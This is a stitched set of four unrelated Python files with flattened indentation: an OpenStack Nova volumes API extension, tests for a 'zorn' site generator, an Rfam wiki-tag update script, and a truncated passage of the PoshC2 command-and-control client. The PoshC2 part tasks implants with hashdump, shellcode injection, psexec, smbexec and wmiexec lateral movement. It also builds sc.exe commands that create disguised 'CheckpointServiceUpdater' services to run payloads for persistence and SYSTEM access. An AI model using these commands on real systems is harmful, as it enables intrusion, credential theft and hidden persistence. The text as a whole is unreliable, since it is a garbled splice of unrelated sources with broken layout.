raise exc.HTTPNotFound()
bdms = self.compute_api.get_instance_bdms(context, instance)
if not bdms:
LOG.debug(_("Instance %s is not attached."), server_id)
raise exc.HTTPNotFound()
assigned_mountpoint = None
for bdm in bdms:
if bdm['volume_id'] == volume_id:
assigned_mountpoint = bdm['device_name']
break
if assigned_mountpoint is None:
LOG.debug("volume_id not found")
raise exc.HTTPNotFound()
return {'volumeAttachment': _translate_attachment_detail_view(
volume_id,
instance['uuid'],
assigned_mountpoint)}
def _validate_volume_id(self, volume_id):
if not uuidutils.is_uuid_like(volume_id):
msg = _("Bad volumeId format: volumeId is "
"not in proper format (%s)") % volume_id
raise exc.HTTPBadRequest(explanation=msg)
@wsgi.serializers(xml=VolumeAttachmentTemplate)
def create(self, req, server_id, body):
"""Attach a volume to an instance."""
context = req.environ['nova.context']
authorize(context)
authorize_attach(context, action='create')
if not self.is_valid_body(body, 'volumeAttachment'):
raise exc.HTTPUnprocessableEntity()
volume_id = body['volumeAttachment']['volumeId']
device = body['volumeAttachment'].get('device')
self._validate_volume_id(volume_id)
msg = _("Attach volume %(volume_id)s to instance %(server_id)s"
" at %(device)s") % locals()
LOG.audit(msg, context=context)
try:
instance = self.compute_api.get(context, server_id)
device = self.compute_api.attach_volume(context, instance,
volume_id, device)
except exception.NotFound:
raise exc.HTTPNotFound()
except exception.InstanceInvalidState as state_error:
common.raise_http_conflict_for_instance_invalid_state(state_error,
'attach_volume')
# The attach is async
attachment = {}
attachment['id'] = volume_id
attachment['serverId'] = server_id
attachment['volumeId'] = volume_id
attachment['device'] = device
# NOTE(justinsb): And now, we have a problem...
# The attach is async, so there's a window in which we don't see
# the attachment (until the attachment completes). We could also
# get problems with concurrent requests. I think we need an
# attachment state, and to write to the DB here, but that's a bigger
# change.
# For now, we'll probably have to rely on libraries being smart
# TODO(justinsb): How do I return "accepted" here?
return {'volumeAttachment': attachment}
def update(self, req, server_id, id, body):
"""Update a volume attachment. We don't currently support this."""
raise exc.HTTPBadRequest()
def delete(self, req, server_id, id):
"""Detach a volume from an instance."""
context = req.environ['nova.context']
authorize(context)
authorize_attach(context, action='delete')
volume_id = id
LOG.audit(_("Detach volume %s"), volume_id, context=context)
try:
instance = self.compute_api.get(context, server_id)
except exception.NotFound:
raise exc.HTTPNotFound()
volume = self.volume_api.get(context, volume_id)
bdms = self.compute_api.get_instance_bdms(context, instance)
if not bdms:
LOG.debug(_("Instance %s is not attached."), server_id)
raise exc.HTTPNotFound()
found = False
try:
for bdm in bdms:
if bdm['volume_id'] != volume_id:
continue
try:
self.compute_api.detach_volume(context, instance, volume)
found = True
break
except exception.VolumeUnattached:
# The volume is not attached. Treat it as NotFound
# by falling through.
pass
except exception.InstanceInvalidState as state_error:
common.raise_http_conflict_for_instance_invalid_state(state_error,
'detach_volume')
if not found:
raise exc.HTTPNotFound()
else:
return webob.Response(status_int=202)
def _items(self, req, server_id, entity_maker):
"""Returns a list of attachments, transformed through entity_maker."""
context = req.environ['nova.context']
authorize(context)
try:
instance = self.compute_api.get(context, server_id)
except exception.NotFound:
raise exc.HTTPNotFound()
bdms = self.compute_api.get_instance_bdms(context, instance)
limited_list = common.limited(bdms, req)
results = []
for bdm in limited_list:
if bdm['volume_id']:
results.append(entity_maker(bdm['volume_id'],
bdm['instance_uuid'],
bdm['device_name']))
return {'volumeAttachments': results}
def _translate_snapshot_detail_view(context, vol):
"""Maps keys for snapshots details view."""
d = _translate_snapshot_summary_view(context, vol)
# NOTE(gagupta): No additional data / lookups at the moment
return d
def _translate_snapshot_summary_view(context, vol):
"""Maps keys for snapshots summary view."""
d = {}
d['id'] = vol['id']
d['volumeId'] = vol['volume_id']
d['status'] = vol['status']
# NOTE(gagupta): We map volume_size as the snapshot size
d['size'] = vol['volume_size']
d['createdAt'] = vol['created_at']
d['displayName'] = vol['display_name']
d['displayDescription'] = vol['display_description']
return d
def make_snapshot(elem):
elem.set('id')
elem.set('status')
elem.set('size')
elem.set('createdAt')
elem.set('displayName')
elem.set('displayDescription')
elem.set('volumeId')
class SnapshotTemplate(xmlutil.TemplateBuilder):
def construct(self):
root = xmlutil.TemplateElement('snapshot', selector='snapshot')
make_snapshot(root)
return xmlutil.MasterTemplate(root, 1)
class SnapshotsTemplate(xmlutil.TemplateBuilder):
def construct(self):
root = xmlutil.TemplateElement('snapshots')
elem = xmlutil.SubTemplateElement(root, 'snapshot',
selector='snapshots')
make_snapshot(elem)
return xmlutil.MasterTemplate(root, 1)
class SnapshotController(wsgi.Controller):
"""The Volumes API controller for the OpenStack API."""
def __init__(self):
self.volume_api = volume.API()
super(SnapshotController, self).__init__()
@wsgi.serializers(xml=SnapshotTemplate)
def show(self, req, id):
"""Return data about the given snapshot."""
context = req.environ['nova.context']
authorize(context)
try:
vol = self.volume_api.get_snapshot(context, id)
except exception.NotFound:
            raise exc.HTTPNotFound()
return {'snapshot': _translate_snapshot_detail_view(context, vol)}
def delete(self, req, id):
"""Delete a snapshot."""
context = req.environ['nova.context']
authorize(context)
LOG.audit(_("Delete snapshot with id: %s"), id, context=context)
try:
snapshot = self.volume_api.get_snapshot(context, id)
self.volume_api.delete_snapshot(context, snapshot)
except exception.NotFound:
            raise exc.HTTPNotFound()
return webob.Response(status_int=202)
@wsgi.serializers(xml=SnapshotsTemplate)
def index(self, req):
"""Returns a summary list of snapshots."""
return self._items(req, entity_maker=_translate_snapshot_summary_view)
@wsgi.serializers(xml=SnapshotsTemplate)
def detail(self, req):
"""Returns a detailed list of snapshots."""
return self._items(req, entity_maker=_translate_snapshot_detail_view)
def _items(self, req, entity_maker):
"""Returns a list of snapshots, transformed through entity_maker."""
context = req.environ['nova.context']
authorize(context)
snapshots = self.volume_api.get_all_snapshots(context)
limited_list = common.limited(snapshots, req)
res = [entity_maker(context, snapshot) for snapshot in limited_list]
return {'snapshots': res}
@wsgi.serializers(xml=SnapshotTemplate)
def create(self, req, body):
"""Creates a new snapshot."""
context = req.environ['nova.context']
authorize(context)
if not self.is_valid_body(body, 'snapshot'):
raise exc.HTTPUnprocessableEntity()
snapshot = body['snapshot']
volume_id = snapshot['volume_id']
vol = self.volume_api.get(context, volume_id)
force = snapshot.get('force', False)
LOG.audit(_("Create snapshot from volume %s"), volume_id,
context=context)
if not utils.is_valid_boolstr(force):
msg = _("Invalid value '%s' for force. ") % force
raise exception.InvalidParameterValue(err=msg)
if utils.bool_from_str(force):
new_snapshot = self.volume_api.create_snapshot_force(context,
vol,
snapshot.get('display_name'),
snapshot.get('display_description'))
else:
new_snapshot = self.volume_api.create_snapshot(context,
vol,
snapshot.get('display_name'),
snapshot.get('display_description'))
retval = _translate_snapshot_detail_view(context, new_snapshot)
return {'snapshot': retval}
class Volumes(extensions.ExtensionDescriptor):
"""Volumes support."""
name = "Volumes"
alias = "os-volumes"
namespace = "http://docs.openstack.org/compute/ext/volumes/api/v1.1"
updated = "2011-03-25T00:00:00+00:00"
def get_resources(self):
resources = []
# NOTE(justinsb): No way to provide singular name ('volume')
# Does this matter?
res = extensions.ResourceExtension('os-volumes',
VolumeController(),
collection_actions={'detail': 'GET'})
resources.append(res)
res = extensions.ResourceExtension('os-volume_attachments',
VolumeAttachmentController(),
parent=dict(
member_name='server',
collection_name='servers'))
resources.append(res)
res = extensions.ResourceExtension('os-volumes_boot',
inherits='servers')
resources.append(res)
res = extensions.ResourceExtension('os-snapshots',
SnapshotController(),
collection_actions={'detail': 'GET'})
resources.append(res)
return resources
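# Roughly, the extension above wires up (a sketch; exact URL routing depends
# on the extensions framework):
#   /os-volumes                                  -> VolumeController (+ /detail)
#   /servers/{server_id}/os-volume_attachments   -> VolumeAttachmentController
#   /os-snapshots                                -> SnapshotController (+ /detail)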
|
|
import os
import shutil
import sys
from io import StringIO
import pytest
from zorn import errors, tasks
def test_task():
task = tasks.Task()
assert task.verbosity == 1
def test_task_run():
task = tasks.Task()
with StringIO() as stream:
sys.stdout = stream
task.run()
assert 'Welcome to zorn!' in stream.getvalue()
def test_communicate_standard_verbosity():
task = tasks.Task(verbosity=1)
with StringIO() as stream:
sys.stdout = stream
task.communicate('standard')
task.communicate('verbose', False)
assert stream.getvalue() == 'standard\n'
def test_communicate_silent():
task = tasks.Task(verbosity=0)
with StringIO() as stream:
sys.stdout = stream
task.communicate('standard')
task.communicate('verbose', False)
assert stream.getvalue() == ''
def test_communicate_verbose():
task = tasks.Task(verbosity=2)
with StringIO() as stream:
sys.stdout = stream
task.communicate('standard')
task.communicate('verbose', False)
assert stream.getvalue() == 'standard\nverbose\n'
def test_admin_task():
os.environ['ZORN_SETTINGS_PATH'] = os.path.join(
os.path.dirname(os.path.abspath(__file__)), 'fixtures', 'test_project', 'settings.py'
)
task = tasks.AdminTask(verbosity=1, update=True)
assert task.verbosity == 1
assert task.update is True
assert task.settings == {'root_dir': 'test', 'other_setting': 'test test'}
def test_process_settings():
os.environ['ZORN_SETTINGS_PATH'] = os.path.join(
os.path.dirname(os.path.abspath(__file__)), 'fixtures', 'test_project', 'settings.py'
)
assert tasks.AdminTask.process_settings() == {'root_dir': 'test', 'other_setting': 'test test'}
def test_update_new_setting():
settings_file_path = os.path.join(
os.path.dirname(os.path.abspath(__file__)), 'fixtures', 'example_project', 'settings.py'
)
os.environ['ZORN_SETTINGS_PATH'] = settings_file_path
with open(settings_file_path, 'r') as f:
original_settings = f.read()
task = tasks.AdminTask(verbosity=1, update=True)
task.update_settings('test_setting', "'a test value'")
with open(settings_file_path, 'r') as f:
modified_settings = f.read()
with open(settings_file_path, 'w+') as f:
f.write(original_settings)
assert "TEST_SETTING = 'a test value'" in modified_settings
def test_update_existing_setting():
settings_file_path = os.path.join(
os.path.dirname(os.path.abspath(__file__)), 'fixtures', 'example_project', 'settings.py'
)
os.environ['ZORN_SETTINGS_PATH'] = settings_file_path
with open(settings_file_path, 'r') as f:
original_settings = f.read()
task = tasks.AdminTask(verbosity=1, update=True)
task.update_settings('project_name', "'a whole new project name'")
with open(settings_file_path, 'r') as f:
modified_settings = f.read()
with open(settings_file_path, 'w+') as f:
f.write(original_settings)
print(modified_settings)
assert "PROJECT_NAME = 'a whole new project name'" in modified_settings
assert "PROJECT_NAME = 'example_project'" not in modified_settings
def test_raise_error_if_no_zorn_setting_path():
    os.environ.pop('ZORN_SETTINGS_PATH', None)  # tolerate the variable being unset
with pytest.raises(errors.NotAZornProjectError):
tasks.AdminTask.process_settings()
def test_raise_error_if_no_root_dir_setting():
    os.environ['ZORN_SETTINGS_PATH'] = os.path.join(
        os.path.dirname(os.path.abspath(__file__)), 'fixtures', 'test_project', 'wrong_settings.py'
    )
with pytest.raises(errors.SettingNotFoundError):
tasks.AdminTask.process_settings()
def test_create_with_defaults():
create_task = tasks.Create()
assert create_task.project_name is None
assert create_task.site_title is None
assert create_task.author is None
assert create_task.style is None
assert create_task.generate is False
assert create_task.cwd == os.getcwd()
assert create_task.root_dir is None
def test_create_with_no_defaults():
create_task = tasks.Create(
project_name='test_project_name',
site_title='test_site_title',
author='Mrs. Test',
style='basic',
generate=True,
verbosity=0,
)
assert create_task.project_name == 'test_project_name'
assert create_task.site_title == 'test_site_title'
assert create_task.author == 'Mrs. Test'
assert create_task.style == 'basic'
assert create_task.generate is True
def test_create_raise_error_if_style_is_not_recognized():
with pytest.raises(errors.UnknownStyleError):
tasks.Create(style='blah')
def test_create_and_run_no_defaults():
create_task = tasks.Create(
project_name='test_project_name',
site_title='test_site_title',
author='Mrs. Test',
style='basic',
verbosity=0,
)
create_task.run()
project_path = os.path.join(os.getcwd(), 'test_project_name')
assert os.path.exists(project_path)
assert os.path.exists(os.path.join(project_path, 'admin.py'))
assert os.path.exists(os.path.join(project_path, 'settings.py'))
assert os.path.exists(os.path.join(project_path, 'gulpfile.js'))
assert os.path.exists(os.path.join(project_path, 'package.json'))
assert os.path.exists(os.path.join(project_path, 'md', 'index.md'))
assert os.path.exists(os.path.join(project_path, 'scss', 'main.scss'))
assert os.path.exists(os.path.join(project_path, 'scss', '_settings.scss'))
assert os.path.exists(os.path.join(project_path, 'scss', '_nav.scss'))
shutil.rmtree(project_path)
def test_create_and_run_only_project_name():
create_task = tasks.Create(
project_name='test_project_name',
verbosity=0,
)
create_task.run()
project_path = os.path.join(os.getcwd(), 'test_project_name')
assert os.path.exists(project_path)
assert os.path.exists(os.path.join(project_path, 'admin.py'))
assert os.path.exists(os.path.join(project_path, 'settings.py'))
assert os.path.exists(os.path.join(project_path, 'gulpfile.js'))
assert os.path.exists(os.path.join(project_path, 'package.json'))
assert os.path.exists(os.path.join(project_path, 'md', 'index.md'))
assert os.path.exists(os.path.join(project_path, 'scss', 'main.scss'))
assert os.path.exists(os.path.join(project_path, 'scss', '_settings.scss'))
assert os.path.exists(os.path.join(project_path, 'scss', '_nav.scss'))
shutil.rmtree(project_path)
def test_generate():
example_project_path = os.path.join(os.path.dirname(os.path.abspath(__file__)), 'fixtures', 'example_project')
assert not os.path.exists(os.path.join(example_project_path, 'index.html'))
os.environ['ZORN_SETTINGS_PATH'] = os.path.join(example_project_path, 'settings.py')
tasks.Generate().run()
assert os.path.exists(os.path.join(example_project_path, 'index.html'))
os.remove(os.path.join(example_project_path, 'index.html'))
def test_generate_with_wrong_settings():
example_project_path = os.path.join(os.path.dirname(os.path.abspath(__file__)), 'fixtures', 'test_project')
os.environ['ZORN_SETTINGS_PATH'] = os.path.join(example_project_path, 'wrong_settings.py')
with pytest.raises(errors.SettingNotFoundError):
tasks.Generate().run()
def test_import_templates():
example_project_path = os.path.join(os.path.dirname(os.path.abspath(__file__)), 'fixtures', 'example_project')
assert not os.path.exists(os.path.join(example_project_path, 'templates'))
os.environ['ZORN_SETTINGS_PATH'] = os.path.join(example_project_path, 'settings.py')
tasks.ImportTemplates().run()
assert os.path.exists(os.path.join(example_project_path, 'templates'))
shutil.rmtree(os.path.join(example_project_path, 'templates'))
def test_import_style():
example_project_path = os.path.join(os.path.dirname(os.path.abspath(__file__)), 'fixtures', 'example_project')
assert not os.path.exists(os.path.join(example_project_path, 'soprano'))
os.environ['ZORN_SETTINGS_PATH'] = os.path.join(example_project_path, 'settings.py')
import_task = tasks.ImportStyle(task_args=['soprano'])
assert import_task.style == 'soprano'
import_task.run()
assert os.path.exists(os.path.join(example_project_path, 'soprano'))
shutil.rmtree(os.path.join(example_project_path, 'soprano'))
def test_import_wrong_style():
with pytest.raises(errors.UnknownStyleError):
tasks.ImportStyle(task_args=['basics'])
|
|
"""
Copyright [2009-2017] EMBL-European Bioinformatics Institute
Licensed under the Apache License, Version 2.0 (the "License");
you may not use this file except in compliance with the License.
You may obtain a copy of the License at
http://www.apache.org/licenses/LICENSE-2.0
Unless required by applicable law or agreed to in writing, software
distributed under the License is distributed on an "AS IS" BASIS,
WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
See the License for the specific language governing permissions and
limitations under the License.
"""
# ---------------------------------IMPORTS-------------------------------------
import os
import sys
import subprocess
import logging
# -----------------------------------------------------------------------------
def wiki_redirects_parser(redirects):
"""
Parses wiki redirects and reports rfam accessions and changes to WK tags
Returns a dictionary with changes per family accession
redirects: redirects.txt file from wiki
"""
wk_edits = {}
    with open(redirects, 'r') as fp:
        rfam_lines = [x.strip() for x in fp if x.find('Rfam') != -1]
    quote = '"'
    for line in rfam_lines:
        # the Rfam accession is the last 7 characters of the line (e.g. RF00001)
        rfam_acc = line[-7:]
        # the old and new page titles are the first and second double-quoted
        # substrings on the line
        positions = [pos for pos, char in enumerate(line) if char == quote]
        old_str = line[positions[0] + 1:positions[1]]
        new_str = line[positions[2] + 1:positions[3]]
        wk_edits[rfam_acc] = (old_str, new_str)
    # return a dictionary with the new redirects per family
    return wk_edits
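# For example (illustrative; the exact redirects.txt layout is assumed): a line
# such as
#   moved "Old page title" to "New page title" ... Rfam ... RF00001
# produces wk_edits['RF00001'] == ('Old page title', 'New page title').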
# -----------------------------------------------------------------------------
def update_desc_file(desc_file, tag, updates):
"""
Function to update changes in desc files automatically
desc_file: Path to a desc file
tag: A valid DESC file tag to be modified e.g. 'WK'
updates: A tuple with the desc changes (old, new)
"""
family_dir = os.path.split(desc_file)[0]
new_desc_path = os.path.join(family_dir, "DESC_NEW")
    with open(desc_file, 'r') as fp:
        desc_lines = fp.readlines()
    with open(new_desc_path, 'w') as new_desc:
        for line in desc_lines:
            if line.find(tag) != -1:
                # normalise underscores to spaces so the old title matches
                line = line.replace('_', ' ')
                line = line.replace(updates[0], updates[1].replace(' ', '_'))
            new_desc.write(line)
# remove old desc and rename new one to DESC
os.remove(desc_file)
os.rename(new_desc_path, os.path.join(family_dir, "DESC"))
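# For example, with updates == ('Old page title', 'New page title') a DESC
# line 'WK   Old_page_title' ends up as 'WK   New_page_title': underscores are
# first mapped to spaces so the old title matches, then the new title is
# written with its spaces re-encoded as underscores.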
# -----------------------------------------------------------------------------
def checkout_family_from_svn(rfam_acc, dest_dir):
"""
Checks out a family from the svn by calling rfco
rfam_acc: A valid Rfam family accession
dest_dir: Destination directory where to check out family
"""
os.chdir(dest_dir)
cmd = "rfco %s" % (rfam_acc)
subprocess.call(cmd, shell=True)
if not os.path.exists(os.path.join(dest_dir, rfam_acc)):
return -1
return 0
# -----------------------------------------------------------------------------
def check_family_into_svn(dest_dir, onlydesc=None):
"""
Check family back to SVN repo using rfci
:param dest_dir:
:return: void
"""
os.chdir(dest_dir)
# list all family directories
family_dirs = [x for x in os.listdir(dest_dir) if x.find('RF') != -1]
for family in family_dirs:
        if onlydesc is None:
            cmd = "rfci -m \'Updated WK in DESC\' %s" % family
        else:
            cmd = "rfci -onlydesc -m \'Updated WK in DESC\' %s" % family
subprocess.call(cmd, shell=True)
# -----------------------------------------------------------------------------
def create_wiki_markdown_links(dest_dir):
"""
Create a list of Rfam accessions and links in markdown
dest_dir: The check out directory
"""
fp_out = open(os.path.join(dest_dir, "family_links.md"), 'w')
families = [x for x in os.listdir(dest_dir) if os.path.isdir(os.path.join(dest_dir, x))]
for rfam_acc in families:
fam_dir = os.path.join(dest_dir, rfam_acc)
desc_fp = open(os.path.join(fam_dir, "DESC"), 'r')
description = ''
wk_tag = ''
# get tags
for line in desc_fp:
if line[0:2] == 'DE':
description = line[2:].strip()
elif line[0:2] == 'WK':
                wk_tag = line[2:].strip().replace(' ', '')  # strip the newline so the link stays on one line
desc_fp.close()
        md_str = '[' + rfam_acc + '-' + description + ']'
md_str = md_str + "(https://en.wikipedia.org/wiki/" + wk_tag + ')'
fp_out.write(md_str + '\n')
fp_out.close()
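# Each output line is a markdown link of the form (values illustrative):
#   [RF00005-tRNA](https://en.wikipedia.org/wiki/Transfer_RNA)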
# -----------------------------------------------------------------------------
def create_rfam_markdown_links(dest_dir):
"""
Create a list of Rfam accessions and links in markdown
dest_dir: The check out directory
"""
fp_out = open(os.path.join(dest_dir, "family_links.md"), 'w')
families = [x for x in os.listdir(dest_dir) if os.path.isdir(os.path.join(dest_dir, x))]
for rfam_acc in families:
fam_dir = os.path.join(dest_dir, rfam_acc)
desc_fp = open(os.path.join(fam_dir, "DESC"), 'r')
wk_tag = ''
# get tags
for line in desc_fp:
if line[0:2] == 'WK':
                wk_tag = line[2:].strip().replace(' ', '')  # strip the newline so the link stays on one line
desc_fp.close()
fp_out.write('[' + rfam_acc + '-' + wk_tag + ']' + "(http://rfam.xfam.org/family/" + rfam_acc + ")\n\n")
fp_out.close()
# -----------------------------------------------------------------------------
def main(redirects, dest_dir):
"""
This function puts all the pieces together parameters are provided through
command line
redirects: Wiki redirects output file
dest_dir: Family check out directory
"""
# create a log file
logging.basicConfig(filename=os.path.join(dest_dir, 'wk_desc_updates.log'), level=logging.ERROR)
# parse wiki redirects file and changes per rfam_acc in a dictionary
wk_edits = wiki_redirects_parser(redirects)
for rfam_acc in wk_edits.keys():
# check out family from the svn repo
status = checkout_family_from_svn(rfam_acc, dest_dir)
# rfco success
if status == 0:
family_dir = os.path.join(dest_dir, rfam_acc)
update_desc_file(os.path.join(family_dir, "DESC"), "WK", wk_edits[rfam_acc])
else:
logging.error("Failed to checkout family %s" % rfam_acc)
# generate markdown for inspection
create_rfam_markdown_links(dest_dir)
# --------------------------------------------------------------------------------------------------
def commit_family_to_svn(dest_dir):
"""
Commits a list of families to the svn using rfci -onlydesc
dest_dir: A destination directory with all
"""
os.chdir(dest_dir)
# create a log file
logging.basicConfig(filename=os.path.join(dest_dir, 'auto_rfci_errors.log'), level=logging.DEBUG)
family_dirs = [x for x in os.listdir(dest_dir) if os.path.isdir(os.path.join(dest_dir, x))]
rfci_cmd = "rfci -onlydesc -m \'Wiki Updates\' %s"
for family_dir in family_dirs:
cmd = rfci_cmd % family_dir
try:
subprocess.call(cmd, shell=True)
        except Exception:
logging.exception("Failed to commit family %s" % family_dir)
# --------------------------------------------------------------------------------------------------
def usage():
# CODE
pass
# --------------------------------------------------------------------------------------------------
if __name__ == '__main__':
redirects_file = sys.argv[1]
dest_dir = sys.argv[2]
main(redirects_file, dest_dir)
# need to wrap this up in an option to just commit or develop an autocommit script
# commit_family_to_svn(dest_dir)
|
|
import base64
import os
import re
import traceback
from prompt_toolkit import PromptSession
from prompt_toolkit.history import FileHistory
from prompt_toolkit.auto_suggest import AutoSuggestFromHistory
from prompt_toolkit.styles import Style
from poshc2.client.Alias import ps_alias
from poshc2.Colours import Colours
from poshc2.Utils import argp, load_file, gen_key, get_first_url, get_first_dfheader, yes_no_prompt
from poshc2.server.AutoLoads import check_module_loaded, run_autoloads
from poshc2.client.Help import posh_help, allhelp
from poshc2.server.Config import PayloadsDirectory, PoshInstallDirectory, PoshProjectDirectory, SocksHost, ModulesDirectory, DomainFrontHeader, PayloadCommsHost
from poshc2.server.Config import PBindSecret, PBindPipeName
from poshc2.server.Core import print_bad, creds, print_good
from poshc2.client.Opsec import ps_opsec
from poshc2.server.payloads.Payloads import Payloads
from poshc2.server.PowerStatus import getpowerstatus
from poshc2.client.cli.CommandPromptCompleter import FilePathCompleter
from poshc2.server.database.DB import new_task, select_item, update_label, kill_implant, get_implantdetails, get_c2server_all
from poshc2.server.database.DB import get_newimplanturl, get_allurls, get_sharpurls, new_urldetails, get_powerstatusbyrandomuri
def handle_ps_command(command, user, randomuri, implant_id):
try:
check_module_loaded("Stage2-Core.ps1", randomuri, user)
except Exception as e:
print_bad("Error loading Stage2-Core.ps1: %s" % e)
    # alias mapping: expand any configured alias into its full command,
    # assigning the result back (str.replace returns a new string)
    for alias in ps_alias:
        if command.startswith(alias[0]):
            command = command.replace(alias[0], alias[1])
command = command.strip()
run_autoloads(command, randomuri, user)
    # opsec failures: warn before running anything on the opsec-warning list;
    # the default (empty input) is to abort, matching the (y/N) prompt
    for opsec in ps_opsec:
        if command.startswith(opsec):
            print_bad("**OPSEC Warning**")
            ri = input("Do you want to continue running - %s? (y/N) " % command)
            if ri.lower() == "n" or ri == "":
                command = ""
            break
if command.startswith("searchhistory"):
do_searchhistory(user, command, randomuri)
return
elif command.startswith("searchhelp"):
do_searchhelp(user, command, randomuri)
return
elif command.startswith("searchallhelp"):
do_searchallhelp(user, command, randomuri)
return
elif command.startswith("download-files "):
do_download_files(user, command, randomuri)
return
elif command.startswith("install-servicelevel-persistence"):
do_install_servicelevel_persistence(user, command, randomuri)
return
elif command.startswith("remove-servicelevel-persistence"):
do_remove_servicelevel_persistence(user, command, randomuri)
return
elif command.startswith("get-implantworkingdirectory"):
do_get_implantworkingdirectory(user, command, randomuri)
return
elif command.startswith("get-system"):
do_get_system(user, command, randomuri)
return
elif command.startswith("invoke-psexec ") or command.startswith("invoke-smbexec "):
do_invoke_psexec(user, command, randomuri)
return
elif command.startswith("invoke-psexecpayload "):
do_invoke_psexecpayload(user, command, randomuri)
return
elif command.startswith("invoke-wmiexec "):
do_invoke_wmiexec(user, command, randomuri)
return
elif command.startswith("invoke-wmijspbindpayload "):
do_invoke_wmijspbindpayload(user, command, randomuri)
return
elif command.startswith("invoke-wmijspayload "):
do_invoke_wmijspayload(user, command, randomuri)
return
elif command.startswith("invoke-wmipayload "):
do_invoke_wmipayload(user, command, randomuri)
return
elif command.startswith("invoke-dcompayload "):
do_invoke_dcompayload(user, command, randomuri)
return
elif command.startswith("invoke-runaspayload"):
do_invoke_runaspayload(user, command, randomuri)
return
elif command.startswith("invoke-runas "):
do_invoke_runas(user, command, randomuri)
return
elif command == "help":
do_help(user, command, randomuri)
return
elif command.startswith("get-pid"):
do_get_pid(user, command, randomuri)
return
elif command.startswith("upload-file"):
do_upload_file(user, command, randomuri)
return
elif command == "kill-implant" or command == "exit":
do_kill_implant(user, command, randomuri)
return
elif command.startswith("migrate"):
do_migrate(user, command, randomuri)
return
elif command.startswith("loadmoduleforce"):
        do_loadmoduleforce(user, command, randomuri)
return
elif command.startswith("loadmodule"):
do_loadmodule(user, command, randomuri)
return
elif command.startswith("pbind-loadmodule"):
do_pbind_loadmodule(user, command, randomuri)
return
elif command.startswith("invoke-daisychain"):
do_invoke_daisychain(user, command, randomuri)
return
elif command.startswith("inject-shellcode"):
do_inject_shellcode(user, command, randomuri)
return
elif command == "listmodules":
do_listmodules(user, command, randomuri)
return
elif command == "modulesloaded":
do_modulesloaded(user, command, randomuri)
return
elif command == "ps":
do_ps(user, command, randomuri)
return
elif command == "get-screenshotmulti":
do_get_screenshotmulti(user, command, randomuri)
return
elif command == "get-powerstatus":
do_get_powerstatus(user, command, randomuri)
return
elif command == "get-screenshot":
do_get_screenshot(user, command, randomuri)
return
elif command == "hashdump":
do_hashdump(user, command, randomuri)
return
elif command == "loadpowerstatus":
do_loadpowerstatus(user, command, randomuri)
return
elif command == "stopdaisy":
do_stopdaisy(user, command, randomuri)
return
elif command == "stopsocks":
do_stopsocks(user, command, randomuri)
return
elif command == "sharpsocks":
do_sharpsocks(user, command, randomuri)
return
elif (command.startswith("enable-rotation")):
do_rotation(user, command, randomuri)
return
elif (command.startswith("get-rotation")):
do_get_rotation(user, command, randomuri)
return
elif command.startswith("reversedns"):
do_reversedns(user, command, randomuri)
return
elif command.startswith("startdaisy"):
do_startdaisy(user, command, randomuri)
return
elif command.startswith("sharp") or command.startswith("run-exe") or command.startswith("run-dll"):
do_sharp(user, command, randomuri)
return
else:
if command:
do_shell(user, command, randomuri)
return
def do_searchhistory(user, command, randomuri):
searchterm = (command).replace("searchhistory ", "")
with open('%s/.implant-history' % PoshProjectDirectory) as hisfile:
for line in hisfile:
if searchterm in line.lower():
print(Colours.GREEN + line.replace("+", ""))
def do_searchhelp(user, command, randomuri):
searchterm = (command).replace("searchhelp ", "")
helpful = posh_help.split('\n')
for line in helpful:
if searchterm in line.lower():
print(Colours.GREEN + line)
def do_searchallhelp(user, command, randomuri):
searchterm = (command).replace("searchallhelp ", "")
for line in allhelp:
if searchterm in line.lower():
print(Colours.GREEN + line)
def do_download_files(user, command, randomuri):
print_bad("Please enter a full path to the directory")
def do_install_servicelevel_persistence(user, command, randomuri):
style = Style.from_dict({
'': '#80d130',
})
session = PromptSession(history=FileHistory('%s/.payload-history' % PoshProjectDirectory), auto_suggest=AutoSuggestFromHistory(), style=style)
try:
path = session.prompt("Payload to use: ", completer=FilePathCompleter(PayloadsDirectory, glob="*.bat"))
path = PayloadsDirectory + path
except KeyboardInterrupt:
return
if os.path.isfile(path):
with open(path, "r") as p:
payload = p.read()
cmd = "sc.exe create CPUpdater binpath= 'cmd /c %s' Displayname= CheckpointServiceUpdater start= auto" % (payload)
new_task(cmd, user, randomuri)
def do_remove_servicelevel_persistence(user, commmand, randomuri):
new_task("sc.exe delete CPUpdater", user, randomuri)
def do_get_implantworkingdirectory(user, command, randomuri):
new_task("pwd", user, randomuri)
def do_get_system(user, command, randomuri):
style = Style.from_dict({
'': '#80d130',
})
session = PromptSession(history=FileHistory('%s/.payload-history' % PoshProjectDirectory), auto_suggest=AutoSuggestFromHistory(), style=style)
try:
path = session.prompt("Payload to use: ", completer=FilePathCompleter(PayloadsDirectory, glob="*.bat"))
path = PayloadsDirectory + path
except KeyboardInterrupt:
return
if os.path.isfile(path):
with open(path, "r") as p:
payload = p.read()
cmd = "sc.exe create CPUpdaterMisc binpath= 'cmd /c %s' Displayname= CheckpointServiceModule start= auto" % payload
new_task(cmd, user, randomuri)
cmd = "sc.exe start CPUpdaterMisc"
new_task(cmd, user, randomuri)
cmd = "sc.exe delete CPUpdaterMisc"
new_task(cmd, user, randomuri)
@creds()
def do_invoke_psexec(user, command, randomuri):
check_module_loaded("Invoke-SMBExec.ps1", randomuri, user)
params = re.compile("invoke-smbexec |invoke-psexec ", re.IGNORECASE)
params = params.sub("", command)
cmd = "invoke-smbexec %s" % params
new_task(cmd, user, randomuri)
def do_invoke_smbexec(user, command, randomuri):
return do_invoke_psexec(user, command, randomuri)
@creds()
def do_invoke_psexecpayload(user, command, randomuri):
check_module_loaded("Invoke-PsExec.ps1", randomuri, user)
style = Style.from_dict({
'': '#80d130',
})
session = PromptSession(history=FileHistory('%s/.payload-history' % PoshProjectDirectory), auto_suggest=AutoSuggestFromHistory(), style=style)
try:
path = session.prompt("Payload to use: ", completer=FilePathCompleter(PayloadsDirectory, glob="*.bat"))
path = PayloadsDirectory + path
except KeyboardInterrupt:
return
if os.path.isfile(path):
with open(path, "r") as p:
payload = p.read()
params = re.compile("invoke-psexecpayload ", re.IGNORECASE)
params = params.sub("", command)
cmd = "invoke-psexec %s -command \"%s\"" % (params, payload)
new_task(cmd, user, randomuri)
else:
print_bad("Need to run createproxypayload first")
return
@creds()
def do_invoke_wmiexec(user, command, randomuri):
check_module_loaded("Invoke-WMIExec.ps1", randomuri, user)
params = re.compile("invoke-wmiexec ", re.IGNORECASE)
params = params.sub("", command)
cmd = "invoke-wmiexec %s" % params
new_task(cmd, user, randomuri)
@creds()
def do_invoke_wmijspbindpayload(user, command, randomuri):
